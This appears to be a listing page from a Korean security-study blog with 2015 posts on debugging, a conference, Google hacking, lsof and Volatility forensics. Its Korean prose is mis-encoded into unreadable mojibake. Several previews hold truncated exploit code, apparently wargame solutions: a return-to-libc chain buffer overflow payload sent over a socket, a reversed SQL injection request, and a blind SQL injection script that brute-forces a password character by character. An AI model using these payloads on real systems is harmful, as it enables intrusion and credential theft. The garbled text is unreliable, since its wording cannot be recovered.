728x90 ๋ฐ์ํ Lucete291 ์์ ํ๋ก์ธ์ค ๋๋ฒ๊น ํ๊ธฐ ๋๋ฒ๊น ์ ํ๋ค๋ณด๋ฉด ์์ ํ๋ก์ธ์ค๋ ๋๋ฒ๊น ์ด ๋์ง ์์ ๋๋ ์๋๊ตฐ์! ๊ทธ๋์ ํ๋ฒ ๊ฒ์ํด ๋ดค์ต๋๋น!! ๊ฒ์์ ํด๋ณด๋ MSDN์๋์ ์ด ํจ์๊ฐ ๋์ค๋๋ฐ์!! ์ด ์ดํจ์๋ฅผ ์ ์ฝ์ด ๋ณด๋ DEBUG_PROCESS ๋ผ๋ ๊ฒ์ ์ฐพ์ ์ ์์์ต๋๋ค. DEBUG_PROCESS ์ด๋ Process Creation์ ์ธ์๋ก debug_process์ธ์๋ก ๋๊ฒจ์ฃผ๋ฉด ๋๋ค๊ณ ๋ช ์๋์ด ์์ต๋๋ค. Security Study/System 2015. 11. 22. ๊ฒฝํฌ๋ํ๊ต SoftCon ํ๊ธฐ ์ค๋ ํ ์์ผ!!! ๊ฒฝํฌ๋ํ๊ต์์ ์ 1ํ SoftCon์ด ์ด๋ ธ์ต๋๋ค.!! ์ง์ง์ง ์ SoftCon์ผ๊น์??? ๋ฌ์ฝคํ๋ฐ์ ^^!!!! 12์ ๋ถํฐ ๋ฑ๋ก์ ์ฒญ์ธ๋ฐ 11์ 30๋ถ์ ๋์ฐฉํด์ 30๋ถ ๋์ ๋ฉ๋ฑ๋ฉ๋ฑ ์๋ค๊ฐ 12์๋ถํฐ ๋ฑ๋ก์ ํ๋ ์ ์ฌ๋ ์ฃผ๋๋ผ๊ตฌ์!!! ์ ์ฌ์ ๋น๋ก ํ์ฅ ๋์๋ฝ์ด์์ง๋ง ์์ฒญ ๋ง์์์ต๋๋ค. 1์ 30๋ถ๋ถํฐ ๋ค์ด๋ฒ์ ๋ค๋์๋ ํ๊ท๋์ ๊ฐ์๋ก ์คํํธ๋ฅผ ํ์ต๋๋ค.! ์ ๋ง ์ฌ๋ฐ์์ด์!! ์ค์ ๋ค์ด๋ฒ์ ์๋ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์ค๋ช ํด์ฃผ์๋ ์ผ๋ง๋ ์ฌ๋ฏธ์๋์ง! ๋ค์์ ๋ผ์ฆ๋ฒ ๋ฆฌํ์ด์ ๊ดํ ๋ด์ฉ์ด ์์ต๋๋ค. ํ ๊ฐ์ง ์์ฌ์ด์ ์ ์ง๋ฌธ์ ๋ํ ๋ต๋ณ์ ์ ๊ฐ ์ํ๋ ๋ต๋ณ์ด ์๋์์ด์ ใ ใ ใ ๊ทธ๋๋ ์ง๋ฌธํ๋ค๊ณ ํฐ์ ์ธ ๋ ๋ฐ๊ณ !!!!! ์ ์ท ์ด ์๊ฒผ์ต๋๋ค.!!! ํฌ์คํธ์๋ ๋ฐ์๋๋ฐ ๋น์ธ๋ณด์์ด์! ์ด๋ ๊ฒ ์ข์๊ฑธ ์ฃผ.. My Story 2015. 11. 21. rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21. sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21. ์์ผํ๋ก๊ทธ๋๋ฐ from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21. Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21. Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21. ๊ตฌ๊ธ ํดํน ๊ตฌ๊ธ ํดํน์ด๋?์ด๋ฆ๋ง ๋ณด๋ฉด ๊ตฌ๊ธ์ ํดํนํ๋ ๋ฏํ ๋๋์ด ๋ ๋ค. ๊ทธ๋ฌ๋ ์ด๊ฒ์ด ๊ตฌ๊ธ ํดํน์ด์๋๋ผ ๊ตฌ๊ธ์ ์ฐ์ฐ์๋ค์ ์ด์ฉํ์ฌ ์๊ณ ์ ํ๋ ์ ๋ณด๋ฅผ ๋ฝ์ ๋ด๋ ๊ฒ์ ๋งํ๋ค.๊ตฌ๊ธ์๋ ๋ง์ ์ฐ์ฐ์๊ฐ ์๋ค. ์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฐ์ธ ์ ๋ณด ๋ฟ๋ง ์๋๋ผ ๋ง์ ์ ์ ์ ๋ณด๋ฅผ ์์ ๋ผ์ ์๋ค. ๊ณผ์ฐ ๊ตฌ๊ธ ํดํน์ด ์ผ๋ง๋ ์ํํ ๊น? ์ด๋ฌํ ์์ผ๋ก ์ ์๋ฅผ ๊ฒ์ํ๋ฉด ์ด๋ฌํ ๋ธ๋ก๊ทธ๋ค์ด ๋์ค๋ ๊ฒ์ ์์ ์๋ค.๊ณผ์ฐ ์ด๋ฆ์ด๋ ์ ํ๋ฒํธ ๊ฐ์ ๊ฐ์ธ์ ๋ณด๋ฅผ ์๊ณ ์๋ ์ํฉ์์ ๊ฒ์์ ํ๋ฉด ๋ ๋์ฑ ๋ง์ ์๋ฃ์ ๋ ๋ง์ ์ ๋ณด๊ฐ ๋์ฌ ๊ฒ์ด๋ค. ๊ตฌ๊ธ ํดํน์ ์ผ๋ฐ์ ์ธ ๊ณต๊ฒฉ์ ๋ณด๋ฉด๋ฐ์ดํ(" ")๋ฐ์ดํ๋ฅผ ์ด์ฉํ๋ฉด ์ฌ๋ฌ๊ฐ ๋จ์ด๋ฅผ ๋ฌถ์ด์ ๊ฒ์ํ ์ ์๋ค. ์๋ฅผ๋ค์ด, Pwn&Play z3alous๋ผ๊ณ ๊ฒ์์ ํ๋ฉด ~ Pwn&Play ~ z3alous ๋ก ๊ฒ์์ด ๋์ง.. Security Study/Web 2015. 11. 21. lsof ๋ช ๋ น์ด ํ๋ก์ธ์ค ์ ๋ณด๋ฅผ ํ์ธํ๊ธฐ ์ํ ๋ช ๋ น์ด๋ lsof๋ผ๋ ๋ช ๋ น์ด๊ฐ ์๋ค. lsof๋ผ๋ ๋ช ๋ น์ด๋ LiSt Open Files์ ์ฝ์๋ก ์ด๋ฆ ๊ทธ๋๋ก ์ํํ๋ ํ๋ก๊ทธ ๋จ์ด๋ค. ์ข ๋ ๊ตฌ์ฒด์ ์ผ๋ก, ํ์ฌ System์์ ๋์๊ฐ๋ ๋ชจ๋ Process์ ์ํด์ Open๋ ํ์ผ๋ค์ ๋ํ ์ ๋ณด๋ฅผ ๋ณด์ฌ์ค๋ค.์ฌ์ฉ๋ฒ์1. ์ด๋ค ํน์ ํ ํ์ผ์ ์ฌ์ฉํ๊ณ ์๋ ํ๋ก์ธ์ค๋ค์ ๋ํ ์ ๋ณด๋ฅผ ์๊ณ ์ถ์ ๋,lsof 2. ์ด๋ค ํ์ผ ์์คํ ๋ด์, ๊ทธ๋ ๊ฒ ํฐ ํฌ๊ธฐ์ ํ์ผ๋ค์ ์ฐพ์ ์ ์๋๋ฐ๋ ๋ถ๊ตฌํ๊ณ , Available Space๊ฐ 0์ ํฅํด์ ์น๋ซ๊ณ ์์ ์๋ ์๋ค. lsof 3. ๊ธด๊ธํ ์ด๋ค ํ์ผ ์์คํ ์ unmountํด์ผ ํ ๋, lsof๋ ํ์ผ ์์คํ ๋ด์ ์๋ ํ์ผ๋ค์ ๋ํด์ ์ต์ธ์คํ๊ณ ์๋ ํ๋ก์ธ์ค๋ค์ ๋ค ์ฐพ์์ค ์ ์๋ค.lsof 4... For3nsic/Forensic 2015. 11. 20. volatility ์ฌ์ฉ๋ฒ 3 printkey ์ด ๋ช ๋ น์ด๋ ๋ ์ง์คํธ๋ฆฌ ํค๊ฐ์ ๋ณด์ฌ์ค๋ค. netscan์ด ๋ช ๋ น์ด๋ ํ์ฑํ๋ ๋คํธ์ํฌ ์ ๋ณด๋ฅผ ์๋ ค์ค๋ค.(windows 7์์๋ง ์ฌ์ฉ๊ฐ๋ฅ) connections๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๋คํธ์ํฌ๋ฅผ ๊ฒ์ฌํ๋ค.์ฌ๊ธฐ์ ๋ ์์ธํ ์๊ธฐ์ํด ๋ฐ์ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๋ค. connscan ์ด ๋ช ๋ น์ด๋ ์์ ๋ช ๋ น์ด์ ๊ฐ์ง๋ง ์ด๋ฏธ ๋์ด์ง ๋คํธ์ํฌ๋ ๋ํ๋ด ์ค๋ค. ] yarascan์ด๋ช ๋ น์ด๋ yara๋ฅผ ์ด์ฉํ์ฌ ์ ๋์ฝ๋ ๋ฑ์ ๊ฒ์ํ์ฌ ์ค๋ค. For3nsic/The Art of Memory Forensic 2015. 11. 19. volatility ์ฌ์ฉ๋ฒ 2 kpcrscan์ด๋ Finding Object Roots in Vista ์ ๋ฌ์ฌ๋ ๊ฒ์ฒ๋ผ ์์ฒด์ฐธ์กฐ ๋ฉค๋ฒ๋ค์ ์ฒดํฌํจ์ผ๋ก์จ ์ ์ฌ์ KPCR ๊ตฌ์กฐ๋ค์ ์ค์บํ๊ธฐ ์ํ์ฌ ์ฌ์ฉ๋๋ ๋ช ๋ น์ด์ด๋ค.IDT ์ GDT ์ฃผ์, current,idle, ๊ทธ๋ฆฌ๊ณ ๋ค์ ์ฐ๋ ๋๋ค, CPU ์ซ์, ๋ฒค๋&์๋, ๊ทธ๋ฆฌ๊ณ CR3 ๊ฐ๋ค์ ํฌํจํ๋ ๊ฐ๊ฐ์ ํ๋ก์ธ์์ ๋ํ ์์ธํ ์ธ๋ถ ์ ๋ณด๋ค์ ๋ํด ์์๋ณด๊ธฐ ์ํด ์ฌ์ฉํ๋ค. ๋ํ ์ด๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๊ธฐ ์ํด profile์ด๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํด์ผํ๋๋ฐ. profile ์ imageinfo๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ์์์๋ค. pslist์ด ๋ช ๋ น์ด๋ ์์คํ ์ ํ๋ก์ธ์ค๋ค์ ๋ณด์ฌ์ค๋ค. PsActiveProcessHead ๋ฅผ ๊ฐ๋ฆฌํค๋ ์ด์ค์ฐ๊ฒฐ๋ฆฌ์คํธ๋ฅผ ์ง๋๊ฐ๋ฉฐ ์คํ์ , ํ๋ก์ธ์ค ์ด๋ฆ, ํ๋ก์ธ์ค ID, ๋ถ๋ชจ ํ๋ก์ธ์ค ID.. For3nsic/The Art of Memory Forensic 2015. 11. 19. Volatility ์ฌ์ฉ๋ฒ Volatility์ ์ฌ์ฉ๋ฒ์ ์์จ ์ฌ์ฉ์ ํ๊ธฐ์ํด ๋ช ๋ น์ด๋ฅผ ์์์ผํ๋ค.๋จผ์ -h ์ต์ ์ ์ค์ผ๋ก ๋ช ๋ น์ด ๋ค์ ๋ณผ์ ์๋ค. ๋ํ ๊ฐ์ ์ ์ฅํ๊ธฐ ์ํด์๋ ๋ช ๋ น์ด๋ค์ > filename.txtWindowns Mac \ Windows ์ Mac์ด๋ ๋ช ๋ น์ด๊ฐ ๋น์ทํ ๊ฑฐ ๊ฐ๋ค. ์ดํ Mac์ผ๋ก๋ง ํ๊ฒ ์ด... ์ฌ๊ธฐ์ ๋ชจ๋ฅด๋ ๋ช ๋ น์ด๋ฅผ ์ฐพ์๋ณด๋ฉฐ ํด๋ณด๋ฉด ๋๊ฒ ๊ณ ๋จผ์ imageinfo ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํด๋ณด๊ฒ ๋ค. imageinfo๋ช ๋ น์ด๋ ๋ค๋ฅธ ํ๋ฌ๊ทธ์ธ์ ์ฌ์ฉํ ๋ --profile=PROFILE----์ ํ๋ผ๋ฏธํฐ๋ก ํด์ผํ๋ ์ ์๋ ํ๋กํ์ผ์ ์๋ ค์ฃผ๋ ๋ช ๋ น์ด์ด๋ค.๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๊ธฐ์ํด ํ์ผ์ ๋ฃ์ด์ผํ๋๋ฐ... ๋ช ๋ น์ด ์ฌ์ฉ๋ฐฉ๋ฒ์ vol.py -f For3nsic/The Art of Memory Forensic 2015. 11. 18. ์ด์ 1 ยทยทยท 13 14 15 16 17 18 19 ยทยทยท 25 ๋ค์ 728x90 ๋ฐ์ํ